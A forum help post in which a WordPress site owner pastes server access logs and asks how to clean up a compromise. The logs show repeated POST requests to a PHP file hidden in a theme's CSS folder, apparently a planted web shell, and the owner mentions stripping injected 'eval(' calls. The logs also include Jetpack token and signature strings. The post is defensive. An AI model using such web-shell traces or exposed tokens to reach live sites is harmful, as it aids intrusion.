162.158.178.13 - - [13/Feb/2017:14:18:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:19:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.128 - - [13/Feb/2017:14:19:17 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
172.68.25.74 - - [13/Feb/2017:14:19:39 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:20:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.59.140 - - [13/Feb/2017:14:20:15 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:21:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:22:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.78.44 - - [13/Feb/2017:14:22:39 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
188.114.110.248 - - [13/Feb/2017:14:22:45 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
108.162.241.86 - - [13/Feb/2017:14:22:50 -0500] "GET /2016/the-count-of-monte-cristo-dumas/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0"
162.158.178.13 - - [13/Feb/2017:14:23:07 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:09 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:13 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:23:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:23:18 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:23 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:23:23 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.179.8 - - [13/Feb/2017:14:23:24 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.65.76 - - [13/Feb/2017:14:23:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:24:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.215.212 - - [13/Feb/2017:14:24:43 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.69.31 - - [13/Feb/2017:14:25:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:26:06 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:26:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.2.98 - - [13/Feb/2017:14:26:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
172.68.10.62 - - [13/Feb/2017:14:26:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.134 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=v8AU5IXaEk&body-hash=nW9aO14FkH6jg8V%2FgukwjWzEG74%3D&signature=03COZkmZOonR1PjkPv3zo1GE7bU%3D" "Jetpack by WordPress.com"
162.158.59.104 - - [13/Feb/2017:14:26:45 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014004&nonce=B0cgAL9GGS&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=IkJ9L25l79us0D58YqTDfYiwUFw%3D" "Jetpack by WordPress.com"
162.158.62.103 - - [13/Feb/2017:14:26:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:27:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:27:25 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
172.68.46.63 - - [13/Feb/2017:14:27:27 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014046&nonce=ovkH9MfFtP&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=4mILsx6OkCay0cGLC7zCYTGNo6E%3D" "Jetpack by WordPress.com"
108.162.215.134 - - [13/Feb/2017:14:27:29 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014049&nonce=ys8p2VhQQN&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=%2FQYFP9Mwy3kMdVnWfxJ0tPHxLH0%3D" "Jetpack by WordPress.com"
162.158.59.236 - - [13/Feb/2017:14:27:30 -0500] "POST /xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D HTTP/1.1" 500 206 "http://sebastiankade.com/xmlrpc.php?for=jetpack&token=dVNF04D%23brDOqY%23%2496dL%29gsJ%25a%24R71co%3A1%3A1×tamp=1487014050&nonce=cCdWRI6I43&body-hash=VxbAQhXPg5hs0Kg73VZeVgeT5uw%3D&signature=HhSeT1rVmC76XtRnuWoLFNWI2%2FU%3D" "Jetpack by WordPress.com"
162.158.78.44 - - [13/Feb/2017:14:27:41 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.69.31 - - [13/Feb/2017:14:28:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:29:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
108.162.237.20 - - [13/Feb/2017:14:29:38 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
172.68.51.152 - - [13/Feb/2017:14:29:46 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:30:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.10.242 - - [13/Feb/2017:14:30:19 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:31:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:31:19 -0500] "GET /wp-admin/post.php HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:32:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.178.13 - - [13/Feb/2017:14:32:40 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:32:43 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.78.44 - - [13/Feb/2017:14:32:43 -0500] "HEAD / HTTP/1.1" 500 187 "-" "jetmon/1.0 (Jetpack Site Uptime Monitor by WordPress.com)"
162.158.179.218 - - [13/Feb/2017:14:32:53 -0500] "GET /feed/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36 OPR/43.0.2442.806"
162.158.178.13 - - [13/Feb/2017:14:32:59 -0500] "GET / HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:04 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:06 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.69.31 - - [13/Feb/2017:14:33:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
141.101.80.200 - - [13/Feb/2017:14:33:16 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
162.158.178.13 - - [13/Feb/2017:14:33:20 -0500] "GET /wp-admin/ HTTP/1.1" 500 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
162.158.22.188 - - [13/Feb/2017:14:33:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:34:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.102.200 - - [13/Feb/2017:14:34:37 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
108.162.215.212 - - [13/Feb/2017:14:34:40 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
162.158.69.31 - - [13/Feb/2017:14:35:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
162.158.69.31 - - [13/Feb/2017:14:36:14 -0500] "GET / HTTP/1.1" 500 206 "http://sebastiankade.com" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
172.68.143.250 - - [13/Feb/2017:14:36:48 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
162.158.59.128 - - [13/Feb/2017:14:36:57 -0500] "POST /wp-content/themes/twentysixteen/css/global32.php HTTP/1.1" 200 333 "http://sebastiankade.com/wp-content/themes/twentysixteen/css/global32.php" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
At the moment I have been going through and removing all the ‘eval(’s to get my site working again, but this is hardly a long term solution. Need some help getting this fixed.
Cheers,
Sebastian
Add a comment
These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.